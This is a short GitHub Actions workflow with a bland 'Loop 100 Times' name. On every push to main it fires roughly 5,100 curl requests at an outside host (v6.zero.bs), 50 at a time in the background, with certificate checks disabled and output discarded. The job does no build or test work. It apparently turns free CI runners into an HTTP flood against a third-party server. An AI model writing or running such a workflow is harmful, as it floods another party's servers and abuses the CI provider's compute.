name: Loop 100 Times e1b1fc5e-3195-4b7e-a4ef-f1c2518ff516

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times e1b1fc5e-3195-4b7e-a4ef-f1c2518ff516
        id: loop_step
        run: |
          counter=0
          max_loops=50
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks https://v6.zero.bs 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks https://v6.zero.bs 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




